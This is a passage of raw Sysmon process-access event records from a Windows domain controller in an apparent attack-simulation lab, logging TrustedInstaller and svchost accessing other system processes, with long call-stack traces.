\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.930{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.914{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.914{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.914{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.914{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.914{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.898{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.898{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.898{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.883{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.883{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.883{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.883{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.867{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
